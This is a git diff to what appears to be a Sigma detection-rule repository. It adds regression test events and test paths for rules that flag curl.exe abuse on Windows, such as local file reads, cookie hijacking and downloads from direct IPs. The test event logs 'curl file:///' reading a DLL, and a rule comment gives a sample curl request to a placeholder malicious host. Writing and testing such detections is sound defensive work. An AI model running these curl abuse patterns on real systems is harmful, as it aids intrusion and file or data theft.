+regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx new file mode 100755 index 0000000000000000000000000000000000000000..c1390aafdf18f40aee0f11383c773cfc2a2a041b GIT binary patch literal 69632 zcmeI0O>A6O701te^WpK>Gh-(;rO>2F3Z)5&m0=6%+xAkoo`bd)H%| zIB_XE{%`c=-H&t6J@rwN+?zehgp(gw(aBr{K&v(53`CBT! zg#hRI-cO&}xn68n+ANzf`&-KFkID5tWpk%`qSA;@Ico@-$?t(E0KvJ(St*^@onO<$F@9Cu+PL|4UlS~FU)sYGKoF68x4c0z zq1}nfopGE_UQXI+=Zi<3NXQ8T+k*kQqh%Q@jr8U_tdM3>pxcYT=rv9qY2uo;7?fkUtgg;u4xdC`da)A=xabUD zaT7)EJwZF*O`|Q@*E{2wJqy7ld}1pymPs?U(zQ>HXF<%+>?QcUmS9^tf@G;8eLkL>O54LwNbT{ux@~77neVl|N!tNYgr2(*sW`Br zRb;HsGKQlIR}v-O8Ou6340r7VsP$OEPT+Ze=U%79pN4kD=f$seo4o?1zdG#(A%jIS zDNa2Nn>Qw_Lv{vjEqHkW43_Lr9Io@Ix9pLz#WM$f_ICLvQ|W7sXRrV6-Ht!(_8n1h ze?(EqOc5pTFP&T-^G62DU1yIy5`5z6U;gXi7jAnC4xhh|5nE~dLcg3ll zMLYB2IG#L(8E4NdB$2B)DSPk0on}5v1sTNl3M{Cv<-{-tm(bB4j>q5LmhONnmqE;L z+b{=ndH|M*LjnbL^F{TBYVneAu((y61(AyWw)o9 zL-}4%!5EggDyCrC+ZBzb&lzXjt+BnywJjg!x+AF@dV31G&bgh{jt-KB&I*NRxf3$5uFJhGYjISdRG3F^I*J#&8;|oz_4aY0sobd|sh%BzV4*Ps&YoEPg zj`WjwH7mSKsZ8F&n_WDC1%)JjIlEyR>B9-^YX`Ly5 z3}wWR-4ovjU0;Ab6Cff3yskt?0FMjGQ}zI|B##BwM^Qf-%N=sBokLbcP9H>>--EUX zub`ulDWZH7t;3j~GDX{c_qT#SH;y)Ty3;0OC-4?ohRn>S6Jln=3(YV_&tRAEJZwT& z-JSkpC=FsJe)ANsV_q+_CzfHI>G=yTPi;@i>o^E~{l^BkO}>8* z#_~Ot*)bYGZ_95ICUva1iH?+9c@oJ^S-coy-WnCtyVpT1uF6)UAQfLCi3L)-vYgjL~z%NesH3uy}2(@k|eSX6!0* z+4gtBJc#>!uy1YLNxW}VaH^ewjWdYQ_K!NhgEo%aj^}BeyZHN9mk5Y}2#A0Ph=2%) zfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y z2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0P zh=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%) zfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y z2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0P zh=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%) lfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2>ibj_%|YLUSR+L literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json new file mode 100644 index 000000000..96eb7c085 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:51:23.281436Z" + } + }, + "EventRecordID": 21706, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:51:23.255", + "ProcessGuid": "0197231E-69EB-693A-1313-000000000800", + "ProcessId": 13896, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml new file mode 100644 index 000000000..a68d78d05 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml @@ -0,0 +1,13 @@ +id: 4dfcc9a3-f555-4692-aa17-bca049de2f61 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 + title: Local File Read Using Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx diff --git a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml index 796cb8382..9278e854e 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml index c47022bc2..b48dbea1b 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml @@ -7,19 +7,26 @@ references: - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv author: Nasreddine Bencherchali (Nextron Systems) date: 2023-07-27 +modified: 2025-12-11 tags: - attack.execution logsource: category: process_creation product: windows detection: + # Example: This command line would trigger the rule + # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com selection_img: - Image|endswith: '\curl.exe' - OriginalFileName: 'curl.exe' - selection_header: + selection_header_flag_1: CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive + selection_header_flag_2: + CommandLine|contains: '--header' + selection_user_agent: CommandLine|contains: 'User-Agent:' - condition: all of selection_* + condition: selection_img and 1 of selection_header_* and selection_user_agent falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml index d4174b490..00d4e7de0 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml @@ -78,3 +78,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml index 7a9688040..0df03ff35 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml @@ -75,3 +75,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml index a404e39aa..261dbcad7 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml @@ -94,3 +94,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml index 8c3360a74..18e416a32 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Access to badly maintained internal or development systems level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml similarity index 85% rename from rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml rename to rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml index eac8b3bf2..d6e5bfa58 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml @@ -23,3 +23,4 @@ detection: falsepositives: - Access to badly maintained internal or development systems level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml index 257c0f0f7..1e6a27821 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml @@ -21,3 +21,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml